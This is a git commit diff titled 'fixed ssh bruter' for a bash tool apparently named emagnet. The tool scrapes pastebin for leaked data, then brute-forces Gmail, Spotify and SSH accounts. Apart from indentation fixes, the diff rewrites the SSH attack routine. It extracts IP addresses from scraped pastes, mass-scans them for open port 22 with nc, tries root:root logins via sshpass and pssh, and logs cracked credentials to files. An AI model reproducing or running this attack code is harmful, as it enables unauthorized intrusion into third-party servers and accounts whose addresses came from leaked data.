fixed ssh bruter

diff --git a/emagnet b/emagnet
--- a/emagnet
+++ b/emagnet
@@ -199,19 +199,19 @@ EOF
 emagnet_quiet() {
   emagnet_conf
   pid="$(ps aux |grep emagnet)"
-   printf "$basename$0: emagnet has been started in background (pid:$(ps aux|grep "SCREEN -dmS emagnet"|awk '{print $2}'|head -n1))\n"
-   screen -S "emagnet" -dm bash "$basename$0" --emagnet
+  printf "$basename$0: emagnet has been started in background (pid:$(ps aux|grep "SCREEN -dmS emagnet"|awk '{print $2}'|head -n1))\n"
+  screen -S "emagnet" -dm bash "$basename$0" --emagnet
 }
 
 emagnet_notice_about_scraping() {
    emagnet_clear
    emagnet_banner
-      echo -e "                            \e[1;31mNOTICE\e[0m:\n"
-      echo -e "[\e[1;31m<<\e[0m] - You are scraping pastbin.com way too fast! \e[1;31mSlow Down\e[0m!"
-      echo -e "[\e[1;31m<<\e[0m] - Pastebin has blocked you from the archive page until you slow down."
-      echo -e "[\e[1;31m<<\e[0m] - You will only be able to download 8 files at time until you raise TIME"
-      echo -e "[\e[1;31m<<\e[0m] - The block from pastebin.com/archive will be lifted within 20 minutes.."
-      sleep 7
+   echo -e "                            \e[1;31mNOTICE\e[0m:\n"
+   echo -e "[\e[1;31m<<\e[0m] - You are scraping pastbin.com way too fast! \e[1;31mSlow Down\e[0m!"
+   echo -e "[\e[1;31m<<\e[0m] - Pastebin has blocked you from the archive page until you slow down."
+   echo -e "[\e[1;31m<<\e[0m] - You will only be able to download 8 files at time until you raise TIME"
+   echo -e "[\e[1;31m<<\e[0m] - The block from pastebin.com/archive will be lifted within 20 minutes.."
+   sleep 7
    emagnet_clear
    emagnet_banner
  }
@@ -244,14 +244,15 @@ if ! [[ -f "$CONF" ]]; then
 echo -e "$basename$0: -- internal error -- you can't backup anything before you downloaded some files"
 exit 1
 fi
+
   if [[ ! -d "$EMAGNET" ]]; then
     echo -e "$basename$0: internal error -- nothing to backup"
     exit 1
   fi
 
- if ! [[ -d "$EMAGNETBACKUP" ]]; then
-   mkdir -p "$EMAGNETBACKUP"
- fi
+   if ! [[ -d "$EMAGNETBACKUP" ]]; then
+     mkdir -p "$EMAGNETBACKUP"
+   fi
 
 emagnet_clear
 emagnet_banner
@@ -369,11 +370,11 @@ emagnet_heavyload() {
          		sleep 1
       		       ((temp_cnt--))
          done
-     echo
+       echo
        bash "$basename$0" --emagnet
         done
        bash "$basename$0" --emagnet
-  fi
+    fi
 }
 
 emagnet_I_was_banned() {
@@ -657,22 +658,22 @@ if [[ "$GBRUTEFORCE" = "true" ]]; then
             emagnet_analyzer
 	  elif [[ "$SBRUTEFORCE" = "true" ]]; then
       	    sed -i '125d' "$CONF"
-     	    sed -i '125 i GBRUTEFORCE=false' "$CONF"
+     	      sed -i '125 i GBRUTEFORCE=false' "$CONF"
       	    sed -i '126d' "$CONF"
-	    sed -i '126 i SBRUTEFORCE=true' "$CONF"
-	    sed -i '127d' "$CONF"
-     	    sed -i '127 i PBRUTEFORCE=false' "$CONF"
+	          sed -i '126 i SBRUTEFORCE=true' "$CONF"
+	          sed -i '127d' "$CONF"
+     	      sed -i '127 i PBRUTEFORCE=false' "$CONF"
             emagnet_conf
             printf "%18s \e[0;32mSPOTIFY\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
             printf "\n%64s \n\n" | tr ' ' '='
             emagnet_analyzer
 	  elif [[ "$PBRUTEFORCE" = "true" ]]; then
-	    sed -i '125d' "$CONF"
-     	    sed -i '125 i GBRUTEFORCE=false' "$CONF"
+	          sed -i '125d' "$CONF"
+     	      sed -i '125 i GBRUTEFORCE=false' "$CONF"
       	    sed -i '126d' "$CONF"
-     	    sed -i '126 i SBRUTEFORCE=false' "$CONF"
+     	      sed -i '126 i SBRUTEFORCE=false' "$CONF"
             sed -i '127d' "$CONF"
-     	    sed -i '127 i PBRUTEFORCE=true' "$CONF"
+     	      sed -i '127 i PBRUTEFORCE=true' "$CONF"
             emagnet_conf
             printf "%20s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
             printf "\n%64s \n\n" | tr ' ' '='
@@ -733,50 +734,39 @@ grep -Ewro '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' "$EMAGNETHOME/.temp" \
 |awk -F':' '{print $2}' \
 |sort \
 |grep -v "$SKIPLIST" \
-|awk -F, '!seen[$1]++' > "$HOME/.config/emagnet/tmp/.emagnet-portscanning.txt"
-if [[ $(cat "$HOME/.config/emagnet/tmp/.emagnet-portscanning.txt"|wc -l) -eq "0" ]]; then
-    printf "%17s[\e[1;31m\e[5m00\e[0m\e[0m] - Ipv4 Addresses found\n"
-    sleep 2
-else
-    clear
-    banner
-      echo -e "                  PORTSCANNING - BRUTEFORCING"
-      printf "\n%64s" | tr ' ' '='
-      printf "\nPort/Brute attack will be started within 2 seconds..............\n"
-      printf "Please use (CTRL+C) to abort the scan at anytime................\n"
-      printf "%64s\n" | tr ' ' '='
-    sleep 2
+|awk -F, '!seen[$1]++' > "$SSHPORTSCAN"
 
-    cat $HOME/.config/emagnet/tmp/.emagnet-portscan \
-    |xargs -i -P 200 timeout 0.5 nc -zvn {} 22 2>&1 \
-    |grep '\S' \
-    |grep -i "open" \
-    |awk -F'[' '{print $2}'\
-    |cut -d']' -f1 > $HOME/.config/emagnet/tmp/.emagnet-sshbruter.txt
+   if [[ $(cat "$SSHPORTSCAN"|wc -l) -eq "0" ]]; then
+      printf "%17s[\e[1;31m\e[5m00\e[0m\e[0m] - IPV4 Addresses found\n"
+      sleep 2
+     else
+        echo -e "              PATIENCE - PORTSCANNING $(cat $SSHPORTSCAN|wc -l) TARGETS"
+        printf "\n%64s\n\n" | tr ' ' '='
+        sleep 2
+        xargs -i -P $THREADS timeout 0.5 nc -zvn {} 22 < $SSHPORTSCAN 2>&1|awk '{print $3} /succeeded/ '|grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' > $SSHTARGETS
+        echo -e "               $(cat $SSHTARGETS|wc -l) TARGETS $(cat $SSHPORTSCAN|wc -l) HAS PORT 22 OPEN"
+        printf "\n%64s\n" | tr ' ' '='
+        sleep 2
 
-    	 while read sshtargets; do
-     		xargs -P 1200 sshpass -f test pssh -v "-o StrictHostKeyChecking=no" -I -A -p 10 -h test -l root -i "uptime" 2>&1 \
-   		|grep FAILURE
-
+       while read sshtargets; do
+          sshpass -p "root" pssh -I -A -h $SSHTARGETS "uptime" < $SSHTARGETS |grep SUCCESS
 		if [[ $? -eq "0" ]]; then
-		    	echo -e "[\e[1;32m>>\e[0m] - Found password: root@{}"
-    			echo -e "================================================================"     >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-   		        echo -e "[+] Login Details For SSH - Cracked $(date +%d/%m/%Y\ -\ %H:%M)"      >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-   			echo -e "[+]------------------------------------------------------------"      >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-   			echo -e "[+] Username: $SSHUSER"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    			echo -e "[+] Password: $SSHPASS"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    			echo -e "================================================================\n\n" >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+		    	echo -e "[\e[1;32m>>\e[0m] - Cracked $sshtargets: $SSHUSER:$SSHPASSWORD"
+    			echo -e "================================================================"       >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+                        echo -e "[+] Login Details For SSH - Cracked $(date +%d/%m/%Y\ -\ %H:%M)"        >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+   			echo -e "[+]------------------------------------------------------------"        >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+   			echo -e "[+] Username: $SSHUSER"                                                 >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+    			echo -e "[+] Password: $SSHPASS"                                                 >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+    			echo -e "================================================================\n\n"   >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
 		  else
- 			echo -e "[\e[1;31m<<\e[0m] - Wrong password: root@{}"
-   			echo -e "[\e[\e[1;31m<<\e[0m] - failed to crack $SSHUSER:$SSHPASS " >> $EMAGNETLOGS/failed-2-crack.txt
+ 			    echo -e "[\e[1;31m<<\e[0m] - Wrong Password For $sshtargets: $SSHUSER:$SSHPASSWORD"
+                            echo -e "[\e[\e[1;31m<<\e[0m] - failed to crack $SSHUSER:$SSHPASS " >> $EMAGNETLOGS/failed-2-crack.txt
 		fi
-	done < $HOME/.config/emagnet/tmp/.emagnet-sshbruter.txt
-
+	done < $SSHTARGETS
 fi
-		    rm "$SSHPORTSCAN" "$SSHTARGETS" "grep" "open" &> /dev/null
-    		  sleep 4
+		    rm "$SSHPORTSCAN" "$SSHTARGETS" "./grep" "./open" &> /dev/null
+    		sleep 4
 }
-
 emagnet_spotify_bruter() {
 VERSION="0.6.0"
 WWWSOURCE="https://nr1.nu/archive/sconsify"
@@ -845,8 +835,7 @@ password="$(echo $line | cut -d: -f2)"
          echo -e "[+] Password: $password"                                              >>    "$EMAGNETLOGS/cracked-gmail-passwords.txt"
          echo -e "================================================================\n\n" >>    "$EMAGNETLOGS/cracked-gmail-passwords.txt"
       fi
-
-  done < "$HOME/.config/emagnet/tmp/.emagnet-passwords.txt"
+    done < "$HOME/.config/emagnet/tmp/.emagnet-passwords.txt"
     rm "$HOME/.config/emagnet/tmp/.emagnet-passwords.txt" &> /dev/null
     sleep 3
 else
@@ -1033,7 +1022,7 @@ if [[ "$pt" -gt "00" ]] && [[ "$et" -gt "00" ]]; then
                                 emagnet_gmail_bruter
                              elif [[ "$SBRUTEFORCE" = "true" ]]; then
                                 printf "%64s \n\n" | tr ' ' '='
-                                printf "%19s";printf "BRUTE FORCING -- \e[1;34mSSH\e[0m ACCOUNTS\e[0m\n\n"
+                                printf "%17s";printf "BRUTE FORCING -- \e[1;34mSSH\e[0m ACCOUNTS\e[0m\n\n"
                                 emagnet_sshbruter
                              elif [[ "$PBRUTEFORCE" = "true" ]]; then
                                 printf "%64s \n\n" | tr ' ' '='
